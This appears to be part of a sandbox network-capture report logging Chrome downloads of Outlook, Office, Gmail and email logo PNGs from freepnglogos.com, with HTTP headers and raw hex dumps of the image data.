                                                                                                2025-01-08 06:22:51 UTC10352INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 28 37 49 44 41 54 78 da ed 9d 07 7c 8d d7 ff c7 3f f7 66 47 64 0b 89 11 44 ec 10 89 a8 55 7b d7 6c ad da ad a2 b4 8a a2 4b 29 6d 75 a0 7f da 52 45 07 4a ad da 7b 94 9a 45 86 2c 89 11 33 44 08 b2 f7 b8 ff e7 1c e5 87 dc fb dc 9b 48 ee f3 3c b9 df 77 eb 15 b9 e7 e4 dc 73 ae 3c 9f b3 be 43 75 b4 9a 95 06 04 41 98 24 2a 12 00 82 30 5d 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2
                                                                                                Data Ascii: PNGIHDR\rf(7IDATx|?fGdDU{lK)muREJ{E,3DH<ws<CuA$*0]H! L0aH! L0aH! L0aH! L0aH! L0aH


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.44976378.46.22.254434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:51 UTC610OUTGET /uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:51 UTC287INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:22:51 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 41401
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb34-a1b9"
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Accept-Ranges: bytes
                                                                                                2025-01-08 06:22:51 UTC16097INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 9a 08 06 00 00 00 4d 16 95 9f 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 20 00 49 44 41 54 78 9c ec dd 77 9c dd 75 9d 2f fe d7 39 53 92 49 32 e9 85 14 13 12 12 48 66 42 0d 58 c1 8a a2 08 3f 75 15 b0 ac 62 5b ac 08 59 1b bb 77 7f f7 b2 f7 de dd 85 bd d7 5d 57 d6 8a 0d 75 95 1f 36 54 d6 95 55 c1 05 12 10 b0 d1 45 90 26 84 96 84 14 92 4c 32 73 ce ef 8f 04 0c 25 12 92 93 f9 7e cf 39 cf e7 e3 81 4e 66 ce cc bc 88 4e 7b cd e7 fd fe 54 02 00 40 73 f8 c8 65 33 b2 a5 b2 38 a9 1f 98 7a 16 a7 52 59 9c a4 2f c9 c8 a2 a3 35 b9 f5 f9 e7 e7 f5 16 1d 02 00 d8 b1 ce a2 03 00 00 f0 38 1f be 72 af 0c 0e 1c 96 4a b5 2f f5 f4 27 95 25 49 7d 7e b6 a4 7b eb 03 2a 49 a5 d8 88 00 00 c3 49 81 05
                                                                                                Data Ascii: PNGIHDRMbKGD IDATxwu/9SI2HfBX?ub[Yw]Wu6TUE&L2s%~9NfN{T@se38zRY/58rJ/'%I}~{*II
                                                                                                2025-01-08 06:22:51 UTC16384INData Raw: e6 a8 e9 28 61 97 9e e8 d3 2b 37 96 6a 6a 19 f7 28 4e e2 92 09 42 0a 58 70 b7 e4 78 af ce 2b 61 7c 30 9c da bb 03 fa ff de a4 f8 80 d0 3c f9 e9 61 ed 6d ec 36 1d 23 e6 9d 35 22 4b f1 3e b7 dc 92 00 f6 5b bb b3 59 13 17 56 e9 60 6b 8f e9 28 00 1c ea 70 5b 8f 26 2d aa d6 ea ed cd a6 a3 84 5d 6e 6a 9c de 9a 59 ae 33 87 67 9a 8e 02 97 a2 80 05 57 3b bf 34 5b 69 89 3e d3 31 ac b2 f0 9d fd da df 4c e1 01 a1 e9 f1 07 b5 f8 dd 03 a6 63 c4 bc 8c 24 9f 4e 1b 9c 6e 3a 06 80 2f f9 b4 ae 4d e3 17 54 69 4f 63 97 e9 28 00 1c a6 ae a9 5b e3 17 54 e9 e3 bd ad a6 a3 84 5d 61 46 82 56 cf a9 d0 49 83 d2 4c 47 81 8b 79 25 b1 51 12 ae c5 e9 83 e1 d5 d6 ed d7 6f 57 ee 33 1d 03 96 b8 77 5d bd 3a 7a 02 a6 63 c4 bc b3 8a e9 52 05 9c 66 f3 c1 0e 8d 9b 5f a5 ad 87 18 d7 07 f0 85 6d
                                                                                                Data Ascii: (a+7jj(NBXpx+a|0<am6#5"K>[YV`k(p[&-]njY3gW;4[i>1Lc$Nn:/MTiOc([T]aFVILGy%QoW3w]:zcRf_m
                                                                                                2025-01-08 06:22:51 UTC8920INData Raw: 70 be fe b6 13 9a 1e 85 82 1c bc df 2c 31 8a 29 f3 e1 1f 3d 9a 3b 1e dd d6 f4 18 00 00 50 3c f7 58 e0 29 be 71 f7 c6 5c 75 7f 5f d3 63 00 1d 60 c5 86 a1 bc ff 07 8f 34 3d 06 00 00 b4 05 01 0b 9e e1 1d 5f 7a 20 db 47 77 7e 4d 0c 60 32 d4 75 f2 07 97 dd 9f 6d 13 5c 49 05 00 80 e9 d2 2e cb 2c 04 2c 78 86 e5 eb 87 f2 f7 d7 ac 69 7a 0c 60 06 fb e4 0d 6b f3 6f 0f f4 37 3d 06 00 00 b4 87 3a 95 80 05 3b f1 fe ef af ca a3 fd c3 4d 8f 01 cc 40 ab fb 86 f3 e7 df 78 a8 e9 31 00 00 a0 ad 08 58 b0 13 5b b6 8f e5 dd df 5c d9 f4 18 c0 0c f4 3f bf f1 50 fa 86 c6 9a 1e 03 00 00 da 8a 80 05 13 f8 dc cd eb f3 d5 3b 37 36 3d 06 30 83 7c e5 8e 0d b9 ec d6 c7 9b 1e 03 00 00 da 8e 80 05 cf e2 5d 5f 7d 30 fd 4e 4a 00 93 60 f3 e0 68 ce fe da 43 4d 8f 01 00 00 ed a7 aa ec c0 82 67
                                                                                                Data Ascii: p,1)=;P<X)q\u_c`4=_z Gw~M`2um\I.,,xiz`ko7=:;M@x1X[\?P;76=0|]_}0NJ`hCMg


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.44976578.46.22.254434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:51 UTC621OUTGET /uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:51 UTC287INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:22:51 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 12501
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb34-30d5"
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Accept-Ranges: bytes
                                                                                                2025-01-08 06:22:51 UTC12501INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 88 00 00 03 00 08 06 00 00 00 a7 dd 96 bb 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 20 00 49 44 41 54 78 9c ed dd fb 93 dd 77 7d e7 f9 d7 b7 bb 25 4b b6 31 96 75 b1 64 30 60 c2 dd 53 05 44 55 a1 24 b5 5d 32 c4 26 ce 60 ec 60 cb f8 26 f9 42 26 fb 6f ec af 99 ad d9 dd d9 99 a9 da ad 9a ad dd 5f 76 67 12 4d 26 40 2b 40 8c 61 05 6e d9 31 89 21 33 bb 18 08 8c 6c 63 b0 6c 75 cb f2 05 cb b2 d4 7d be fb c3 e9 16 fd 11 96 ad cb e9 fe 9c cb e3 51 95 1f 52 65 5a af 22 41 79 a6 bf e7 bc bf 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 2f 35 b5 07 00 30 1a 5e 9a cc fb e6 92 dd 4d 72 4f 92 17 db 26 7f 3d de e4 ab eb bf 9f e7 6a 6f 03 4a 02 11 80 65 f3 fc ce 6c 98 98 cb bd 4d b2 3b c9 d6 33 fc
                                                                                                Data Ascii: PNGIHDRbKGD IDATxw}%K1ud0`SDU$]2&``&B&o_vgM&@+@an1!3lclu}QReZ"Ay@/50^MrO&=joJelM;3


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.44976478.46.22.254434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:51 UTC581OUTGET /uploads/red-email-mail-logo-png-8.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:51 UTC289INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:22:51 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 145460
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb2b-23834"
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Accept-Ranges: bytes
                                                                                                2025-01-08 06:22:51 UTC16095INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 24 00 00 03 2c 08 06 00 00 00 a5 59 66 69 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 04 67 41 4d 41 00 00 b1 8e 7c fb 51 93 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 02 37 aa 49 44 41 54 78 da ec c1 31 01 00 00 08 c0 20 ed 1f 7a c6 f0 01 b6 1a 00 00 80 0f 27 00 3b 74 4c 03 00 00 c0 30 28 99 7f d1 95 b1 07 24 30 05 00 00 c0 4b 02 b0 5f c7 02 00 00 00 00 83 fc ad 87 b1 a7 2c 12 12 00 00 60 93 00 ec d7 b1 00 00 00 00 c0 20 7f eb 61 ec 29 8b 84 04 00 00 d8 24 80 00 ec d7 b1 00 00 00 00 c0 20 7f eb 61 ec 29 8b 84 04 00 00 d8 24 80 00 ec d7 b1 00 00 00 00 c0 20 7f eb 61 ec 29 8b 84 04
                                                                                                Data Ascii: PNGIHDR$,YfipHYs.#.#x?vgAMA|Q cHRMz%u0`:o_F7IDATx1 z';tL0($0K_,` a)$ a)$ a)
                                                                                                2025-01-08 06:22:51 UTC16384INData Raw: 34 8f c8 5e 95 aa 42 c5 10 cc 92 c0 64 76 ce ac de 9f 7b 4f 38 4e d8 b0 21 7e e3 d0 93 8d 37 27 96 e3 84 6d e6 37 c9 bf 74 dd 81 91 27 b6 26 4f 81 89 42 c9 0f 80 a4 04 25 32 f1 6d 73 61 70 2f 98 dc c7 34 86 3e c6 49 2f fa 3d ed 02 68 b4 43 32 98 c0 bc 79 c0 16 11 e3 16 60 06 f2 80 67 2a f4 13 b5 88 d9 c4 8e ed 26 f6 d1 ce c8 28 18 c0 8e 08 a5 cb b2 b0 89 23 9f 8e 05 5e 5a 85 d4 09 61 00 76 3e c0 1d 10 10 0d 5d 92 05 5e 96 85 7c 49 21 e8 62 43 50 27 04 d8 41 01 cd 82 30 4b 4b 83 67 42 46 c1 28 18 6a 00 b4 4c eb c7 f9 f3 0c 5f 8f 1e 65 f8 75 e3 06 d6 65 5d c8 b3 26 e0 8e 09 74 e0 8a 11 7a cf 09 48 1d 13 da 1d 27 f8 30 03 91 72 0c 0c e4 9d da 35 da 31 19 05 64 75 4a e0 95 c6 7f bc 4b b7 90 3b 24 50 7a 07 90 f2 11 1b bd 34 71 c0 00 40 00 8d 76 48 06 57 87 a4
                                                                                                Data Ascii: 4^Bdv{O8N!~7'm7t'&OB%2msap/4>I/=hC2y`g*&(#^Zav>]^|I!bCP'A0KKgBF(jL_eue]&tzH'0r51duJK;$Pz4q@vHW
                                                                                                2025-01-08 06:22:51 UTC16384INData Raw: ad 1b 60 98 ba 4f d5 0a 91 b5 42 49 10 49 ac b8 fd 48 dc 1c 65 13 22 25 ca 33 89 47 a3 74 6f 04 45 08 86 6a 35 0d 64 88 b2 2c 4b 28 ba 0e 0c 92 b6 76 5a f0 be c8 b5 ef 3f 62 04 8d 28 5a 35 cc 79 46 fc 30 2d 8d 4a c4 91 b3 5c e2 cf 09 74 b2 16 d7 b6 10 be 31 99 25 65 71 64 2c 8d 80 b4 d6 b8 45 c7 80 9e 1c 52 12 35 9a 40 8a f1 da 69 22 22 55 8c 68 02 4c fa 97 2c 20 12 53 4c 8b cb 4e ed 93 0b 9b 6f f7 69 84 b6 a9 60 06 a9 3e 96 e4 b5 a8 a7 1c 19 c0 d3 eb 0c 33 2e 43 ef 89 c2 75 b6 0e 89 ca 1a 11 f5 50 94 dc 87 61 37 f3 e4 65 1c a1 6e db 89 ba 45 86 a7 49 0f e7 4e cf d3 a3 70 c5 00 08 38 c0 41 68 7d 93 1c 75 07 8d eb 77 04 4a ce cc 1b 5f 73 95 43 db c2 e1 f6 9a f7 bc 7f 5f de 02 68 f8 cd 90 b4 b4 80 ca c2 64 9c 9b d9 b1 cd 8e 20 cf 8c c0 e4 90 6f 65 1f ed 88
                                                                                                Data Ascii: `OBIIHe"%3GtoEj5d,K(vZ?b(Z5yF0-J\t1%eqd,ER5@i""UhL, SLNoi`>3.CuPa7enEINp8Ah}uwJ_sC_hd oe
                                                                                                2025-01-08 06:22:51 UTC16384INData Raw: 81 ad f3 41 48 1e 63 33 3b 68 b9 16 e8 a8 5f d0 88 3a 6c 76 c4 d0 70 58 85 15 ec 98 5f d0 8c 08 17 da 31 bf b8 2e 06 23 67 66 04 a3 03 43 e0 88 5f 7c f7 8b e0 db c4 8e ab e3 c9 00 8d 4f f0 26 76 d0 12 2d d0 a9 5a a0 ce 08 ec 78 5f 3b bb d1 13 b5 a8 08 3e 7d fc c8 b0 6d c3 06 70 07 64 07 90 fe f8 e1 03 4e b5 d8 46 cf 70 2d c5 c3 b6 b4 e3 19 b0 73 b3 12 98 8e 41 18 04 40 b3 26 1e 01 01 0c 11 09 09 a3 9d 93 a1 d8 79 45 5b ae 85 7c e4 2f 31 9d 0e 9c 9d 10 46 46 bc 65 05 b6 f2 04 d7 2c 09 b6 19 92 ff 0c b8 37 c4 c3 66 49 fe 82 f6 90 80 3a 24 20 31 60 67 e4 1f b0 5c 7a 73 f8 f0 90 8d 2b 25 7d 7d 06 4e 01 01 86 df c0 fc 4d 68 d9 16 a1 fd 23 0c 44 74 4c b0 75 2c 90 3b 26 c8 34 31 03 1c a3 80 76 9d 12 5c 17 89 c2 2e 48 04 2f 61 64 c0 5c 26 09 8d 53 d0 4d c4 8b e9
                                                                                                Data Ascii: AHc3;h_:lvpX_1.#gfC_|O&v-Zx_;>}mpdNFp-sA@&yE[|/1FFe,7fI:$ 1`g\zs+%}}NMh#DtLu,;&41v\.H/ad\&SM
                                                                                                2025-01-08 06:22:51 UTC16384INData Raw: 30 5f 84 7a 8a d4 ed dc ee ae 57 cb d6 aa 82 8c 50 d7 72 07 46 76 c3 01 7f 3d 2b 9d 6f c9 3f 7f 64 2b 82 bb d4 8b 2d 25 88 2d e5 24 ab 92 85 96 74 4e da bf 43 b2 06 fe 08 c0 08 66 98 21 e2 3b 52 8a 45 7e 0e f0 47 66 ba b7 6b 71 b9 5f 09 4c 5a 2a 23 1a 01 fe 4d 55 ad 96 34 12 f9 6b d5 fa e2 4f f1 08 8e 99 43 c2 64 7f 97 00 24 97 2a 20 6f 33 ad 11 da 2d 32 c0 d6 ca 88 19 48 56 00 4a 8f ca 89 f8 0e 6b 05 71 0a 67 22 53 84 f4 ac 06 99 e3 94 a4 cc 37 da c5 43 8c f1 c0 49 6b 2f 36 bc 6c 7e 31 47 3c 04 60 ef ea 52 00 84 41 b0 f5 b2 d3 ec fe 07 ea 20 85 a5 60 a1 e9 a2 41 0b 7d 9c 3d 04 15 ed 73 df 4f 5f 0d 89 04 1f 57 20 22 d7 99 ae 95 80 e4 b3 60 24 da 3f e5 5d 50 6a f2 4a 09 ed 23 eb 47 b0 16 d2 8f 30 17 3b 92 3f 12 49 6d b7 ac 35 67 f0 fd fa 23 56 bf 2b 01 12
                                                                                                Data Ascii: 0_zWPrFv=+o?d+-%-$tNCf!;RE~Gfkq_LZ*#MU4kOCd$* o3-2HVJkqg"S7CIk/6l~1G<`RA `A}=sO_W "`$?]PjJ#G0;?Im5g#V+
                                                                                                2025-01-08 06:22:51 UTC16384INData Raw: ac 18 d1 f1 07 0b 77 a4 4e c9 c7 a3 47 47 13 37 12 b0 f2 f7 47 59 b2 f5 87 84 b8 24 45 0d a1 8e 2a be 4e 2b d5 ef a8 21 a3 33 42 6c 18 80 93 1d 68 c9 0e f4 02 44 f0 b1 ae a0 25 3b d0 4d cc a0 4e 0a bb 99 19 03 13 68 d9 d6 28 20 08 60 17 22 62 db d0 8e ab d1 48 cc ec 08 23 d2 0d ed c4 74 46 f0 95 4d ff a1 71 0e 5e 9e 07 ec 70 32 00 3b 9e e0 fb 45 80 1d 11 66 50 67 04 b6 67 64 84 cd 8c 5c bd 78 11 7e e7 08 e8 68 5f d8 ec 08 ec 98 5f e4 b8 c4 d6 f9 c0 c6 c6 37 4b 42 ec ec 08 7a 27 84 81 81 bc d9 34 72 3b b5 a3 60 08 74 4a a0 77 90 a0 2f d9 42 df 33 fb 1f d6 c6 a7 22 00 08 c0 de 19 eb 30 08 c3 40 f4 aa 4a 48 4c 1d d8 59 e8 cc dc ff ff 88 4a 8c fc 06 4a 95 12 2b 50 17 05 db 54 ad 54 da 58 62 61 62 08 c1 8f cb f9 3e 0b 24 de 77 66 08 e1 20 92 55 92 dd c0 8a 6a
                                                                                                Data Ascii: wNGG7GY$E*N+!3BlhD%;MNh( `"bH#tFMq^p2;EfPggd\x~h__7KBz'4r;`tJw/B3"0@JHLYJJ+PTTXbab>$wf Uj
                                                                                                2025-01-08 06:22:51 UTC16384INData Raw: 1d 55 f3 8f 1e b4 4e 84 a6 e2 98 dc 11 26 20 a5 e9 38 73 ec 5b 66 ab 56 99 57 24 05 ff 9a 31 b0 d4 eb fe 66 fa 03 a9 7d 17 2e 64 e7 bb 3c 87 55 6c f3 41 0f da 41 cd d0 10 49 c6 12 68 37 a8 20 22 32 e3 eb a9 08 28 5d 44 24 44 46 5c 89 07 bb 50 91 11 74 20 22 d0 26 75 b5 3d f7 59 22 a2 c5 1a 80 f0 14 e6 3e 99 da 5f 15 0d 43 81 93 8f 72 24 6f aa ef fb 1d a2 ac ec 0e 74 2b f6 9b a5 f0 9b 35 0d 61 3a 22 09 89 f1 a5 05 df af a6 6c 2d 0e 55 75 fa f6 7b dd 05 60 ef 6c 52 10 86 81 28 3c e9 cf 42 97 2e ba ee 19 5c 79 0d 4f 20 14 77 1e a2 57 e9 d6 03 e8 65 bc 81 1b 71 a1 05 2d e8 4c 4c 74 a8 99 92 0a d2 52 1a 98 4d 0b 22 38 99 bc 2f be 49 fa 0a 24 21 7e ab 23 26 e2 4c 27 a3 85 10 1e bc 5f 84 37 bd f3 18 81 a4 33 20 01 f0 b7 6d 49 d6 ad 0a be 2d 3f 77 03 24 f6 9e 8e
                                                                                                Data Ascii: UN& 8s[fVW$1f}.d<UlAAIh7 "2(]D$DF\Pt "&u=Y">_Cr$ot+5a:"l-Uu{`lR(<B.\yO wWeq-LLtRM"8/I$!~#&L'_73 mI-?w$
                                                                                                2025-01-08 06:22:51 UTC16384INData Raw: 6a b4 23 42 01 58 b9 70 21 43 5e 42 02 7c c9 93 08 b4 43 22 c0 80 b8 6b 04 d7 6c 05 a1 99 11 7a dd cc ce c8 40 fa 66 76 86 61 da 21 21 65 76 04 bd 43 42 60 76 24 1d d8 19 99 35 dc d2 3f 40 00 8d 94 0e 09 1b d0 97 f7 80 09 5b 1a df 5e 12 9c 1b dc 47 c1 a0 e8 90 60 eb 98 10 73 37 09 29 a7 6e e1 db 4b 82 6d 3f 09 f2 68 07 6c f9 16 ac 20 91 1a ed 94 50 1d 7c bb 76 8d e1 fd b6 6d 0c 5f 4e 9f 86 e4 51 a4 0d f0 f0 e5 5c a0 8e 08 6c 39 17 6c d6 04 74 74 30 74 49 17 58 0f 5a e7 84 98 4a 92 dc cd df b8 1a f9 d4 b8 4f 82 94 fb 48 f0 a9 a1 a4 23 32 90 8d 06 52 3b 26 f8 d4 fc a7 50 2d b9 9d 02 4a 3b 2f a4 2e 29 43 29 4f a1 7b 43 c0 37 aa 83 2e 32 04 2d b9 e2 e5 05 77 44 c0 33 22 a0 cd ea a0 4e 08 74 93 3a 68 c9 16 b8 23 02 9a 39 01 76 3c 98 81 72 cc aa aa a3 a7 66 51
                                                                                                Data Ascii: j#BXp!C^B|C"klz@fva!!evCB`v$5?@[^G`s7)nKm?hl P|vm_NQ\l9ltt0tIXZJOH#2R;&P-J;/.)C)O{C7.2-wD3"Nt:h#9v<rfQ
                                                                                                2025-01-08 06:22:51 UTC14677INData Raw: 4a 3a 1f 94 de a6 ce 48 64 fc 8f ee 13 a1 6e fd 84 3e 2b f2 1b ad 33 02 5a 86 f5 09 da 19 41 be fc f0 1d 94 fd 09 aa 1e 4f f9 01 9a 3c 01 6d 62 bf 3c 1a ea 83 17 00 04 d0 68 87 64 08 82 15 4c 4c 7e 40 6a 23 f2 2c 09 72 a7 84 0d 47 87 04 f9 36 f7 d1 4e c9 68 c7 84 d2 8e 09 03 03 e1 bd 0b c4 f2 49 9d 41 a1 b4 73 42 96 3c 11 1d 14 72 d8 f8 96 65 51 72 fa 16 39 1d 11 6a cd 92 90 3b 43 42 cb 0e 09 3e 75 03 39 3b 42 8b 63 7e c9 69 c8 e3 9d 35 c1 71 c4 3c b1 1d 09 72 66 3b 88 bd 5d 9e 81 8c 8e 08 31 77 c2 8c 76 44 e8 df 19 f9 83 d6 19 01 f5 22 40 33 1f 5f 90 66 46 60 b3 23 6f 91 3a 23 04 4e d4 02 01 7f 60 67 64 d3 68 a8 0f 6e 00 10 40 a3 1d 92 a1 db 29 a9 00 52 ed 0c 68 9d 8b d1 4e c9 28 a0 45 c7 04 57 23 15 5f c3 96 d8 ce 0a b1 1d 15 72 30 29 9b e9 89 ed 68 e0
                                                                                                Data Ascii: J:Hdn>+3ZAO<mb<hdLL~@j#,rG6NhIAsB<reQr9j;CB>u9;Bc~i5q<rf;]1wvD"@3_fF`#o:#N`gdhn@)RhN(EW#_r0)h


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.44976278.46.22.254434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:51 UTC579OUTGET /uploads/gmail-email-logo-png-12.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:51 UTC287INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:22:51 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 29151
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb2b-71df"
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Accept-Ranges: bytes
                                                                                                2025-01-08 06:22:51 UTC16097INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 71 a6 49 44 41 54 78 da ed 7d 07 78 55 65 ba 75 c6 02 48 8f 63 9d 19 9d eb ef 38 33 ea 14 db d8 bd 96 b9 23 1d d4 c1 8a 0a 82 bd a1 62 1f 95 de 9b 88 20 3a 8e 4a ef 24 f4 4e 20 88 4a 17 0d 84 1a 9a d4 e4 9c 93 90 a8 63 81 ef 7f df af 9c bd cf c9 49 48 39 65 97 f5 3e cf 7a 22 dc b9 9a e4 ec fd ad f5 bd 65 bd 69 69 08 04 c2 d1 b1 61 c5 07 27 12 ce 22 fc 99 70 0b e1 2e c2 e3 84 d7 08 7d 08 23 08 63 09 d3 08 0b 09 cb 09 6b 08 5b 08 3b 08 c1 28 7c 47 10 51 f8 2e c6 ff 6e 87 fe 77 ac d1 ff ce 85 fa bf 31 56 ff 37 fb e8 ef e1 71 fd 3d dd a2 bf 47 fe 5e 4f c4 27 87 40 20 10 08 44 d9 e4 de 90 f0 17 42 73 c2 13 84 9e 84 51 84 c5 84 af 09 07 09 47 63 10 b6 d3 71
                                                                                                Data Ascii: PNGIHDRxqIDATx}xUeuHc83#b :J$N JcIH9e>z"eiia'"p.}#ck[;(|GQ.nw1V7q=G^O'@ DBsQGcq
                                                                                                2025-01-08 06:22:51 UTC13054INData Raw: 15 c1 bc a9 6c 14 14 17 8f 80 43 86 fc 4f 24 1c 05 11 43 00 78 5e 00 44 97 03 7e 28 b4 be 3f 33 22 98 f1 b6 9a 0e 90 e5 80 df 58 3d 01 e1 72 40 43 f8 04 38 29 ed df cc 96 f6 a7 3f 4b 7b 5f 72 7b dc c3 69 7f dd f0 97 cb 26 3f 7c db b7 a7 fd 1d 46 fe 10 00 40 65 8c 82 d6 65 8f a8 2e ef 30 e7 9f c8 02 e0 4c 90 30 04 80 af 04 40 74 39 e0 bf 45 91 22 40 96 03 1e 2d bd 3b 40 93 0c c8 d7 49 e3 7e 3a ed df c2 74 fb df a0 ec 7d e5 56 bf 4f 54 c3 1f 11 7e 4e ee a7 29 35 f9 81 00 80 00 88 9f 51 d0 5b 64 14 d4 3f 1e dc 73 26 0b 80 bf 80 84 21 00 7c 27 00 ec fb 03 4c 63 60 d1 01 db 74 c0 d0 a8 72 40 1d cb 23 80 57 e8 b6 a8 0f 02 4e a1 bd af 5c e2 d4 b4 ae 14 00 d6 9c 3f 9b fc b4 b5 bc fd 99 fc c9 db 5f a6 fc 37 e9 95 be 5f 39 93 fc 21 00 80 4a 4d 06 90 51 50 d6 ac 81
